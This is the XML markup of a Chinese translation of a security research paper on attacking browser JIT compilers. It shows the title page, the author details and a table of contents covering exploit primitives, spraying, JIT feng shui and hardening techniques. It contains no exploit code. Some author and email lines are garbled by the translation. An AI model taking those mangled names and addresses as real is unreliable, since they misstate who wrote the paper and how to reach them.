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0A833" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC18FBC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB3E5A8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7E2702" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25AB74C9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DABFCA4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A07ED35" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D23C49F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103AF4B6" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="679"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E798196" wp14:editId="166D4351">
            <wp:extent cx="5794198" cy="26003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794198" cy="2600325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CAA1CA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38AD9AA6" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7712AB17" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="223A9AED" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D563C75" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305A1D7C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="89"/>
        <w:ind w:left="1869"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击客户端JIT编译器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29F4BE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409ED692" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289A65B3" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="40"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463C4284" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="54"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10D0AE87" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:right="6857"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>克里斯·罗尔夫（Chris</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rohlf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>）@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chr</w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="thick" w:color="000099"/>
          </w:rPr>
          <w:t>isrohlf</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="thick" w:color="000099"/>
          </w:rPr>
          <w:t xml:space="preserve"> chris@matasano.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30C42C16" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70DC26EC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48CE3142" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="91" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="7725"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>y按IV你太ski</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Y @眼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29447ED4" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="18"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:b/>
            <w:color w:val="000099"/>
            <w:sz w:val="28"/>
            <w:u w:val="thick" w:color="000099"/>
          </w:rPr>
          <w:t>眼@马踏伞哦.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43C25A4A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1500" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120EA978" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="73"/>
        <w:ind w:left="520"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000099"/>
          <w:u w:val="single" w:color="000099"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>介绍</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5788193D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="7"/>
        <w:ind w:left="880"/>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark0" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>目标</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B3D1F4A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="27" w:line="266" w:lineRule="auto"/>
        <w:ind w:left="880" w:right="5457" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark1" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>JI</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark1" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>T设</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark1" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>计概述Tr</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark1" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>ac</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark1" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>e / Jaeg</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark2" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>erMon</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark2" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>k</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark2" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>ey体系结构</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark2" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark2" w:history="1"/>
    </w:p>
    <w:p w14:paraId="12E62377" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto"/>
        <w:ind w:left="880" w:right="6857" w:firstLine="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark3" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>TraceMonkey</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark4" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>LL</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark4" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>V</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark4" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>M</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark4" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>JI</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark4" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>T架构</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21EB4DF2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="231" w:lineRule="exact"/>
        <w:ind w:left="1240"/>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark5" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>LLV</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark5" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>M</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark5" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>用途</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B19FBDA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="26" w:line="266" w:lineRule="auto"/>
        <w:ind w:left="520" w:right="3879" w:firstLine="720"/>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark6" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>LLV</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark6" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>M</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark6" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>代码发</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark6" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>射和</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark6" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>执行漏洞</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark6" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark6" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark6" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark6" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark7" w:history="1"/>
    </w:p>
    <w:p w14:paraId="0EDFCA37" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto"/>
        <w:ind w:left="880" w:right="7725" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark8" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>漏洞利用原始</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark8" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>喷雾</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark8" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark9" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark9" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark9" w:history="1"/>
    </w:p>
    <w:p w14:paraId="3A5D68A9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="231" w:lineRule="exact"/>
        <w:ind w:left="880"/>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark10" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>页面权</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark10" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>限</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark10" w:history="1"/>
    </w:p>
    <w:p w14:paraId="2C84FC94" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="25" w:line="266" w:lineRule="auto"/>
        <w:ind w:left="520" w:right="5457" w:firstLine="360"/>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark11" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>RO</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark11" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>P</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark11" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>gaJIT</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark11" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>和J</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark11" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>IT</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark11" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>风水</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark11" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>强化</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark11" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>技术</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark11" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark11" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark11" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark12" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark12" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark12" w:history="1"/>
    </w:p>
    <w:p w14:paraId="04DA83CC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="266" w:lineRule="auto"/>
        <w:ind w:left="880" w:right="5457"/>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark13" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>分配API页面权限的随机</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark13" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
          </w:rPr>
          <w:t>化</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark13" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark13" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark13" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark13" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark13" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark14" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark14" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark14" w:history="1"/>
    </w:p>
    <w:p w14:paraId="4DFEEE45" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="231" w:lineRule="exact"/>
        <w:ind w:left="880"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark15" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>保护页面</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark15" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark15" w:history="1"/>
    </w:p>
    <w:p w14:paraId="480799A5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="26" w:line="266" w:lineRule="auto"/>
        <w:ind w:left="880" w:right="6875"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark16" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>恒定折页恒定</w:t>
        </w:r>
        <w:proofErr w:type="gramStart"/>
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>盲</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark16" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>区</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark16" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>分配限制</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark17" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark17" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark17" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark18" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark18" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark18" w:history="1"/>
    </w:p>
    <w:p w14:paraId="669E1AD7" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="247" w:lineRule="auto"/>
        <w:ind w:left="520" w:right="3879" w:firstLine="360"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_bookmark19" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>随机NOP</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark19" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>插入</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark19" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>/随</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark19" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>机码</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark19" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>基本偏移JIT强化</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark19" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>比</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark19" w:history="1">
        <w:r>
          <w:rPr>
            <w:color w:val="000099"/>
            <w:u w:val="single" w:color="000099"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>较</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink w:anchor="_bookmark19" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark19" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark19" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark19" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark19" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark19" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark20" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark20" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark20" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark20" w:history="1"/>
      <w:hyperlink w:anchor="_bookmark20" w:history="1"/>
    </w:p>
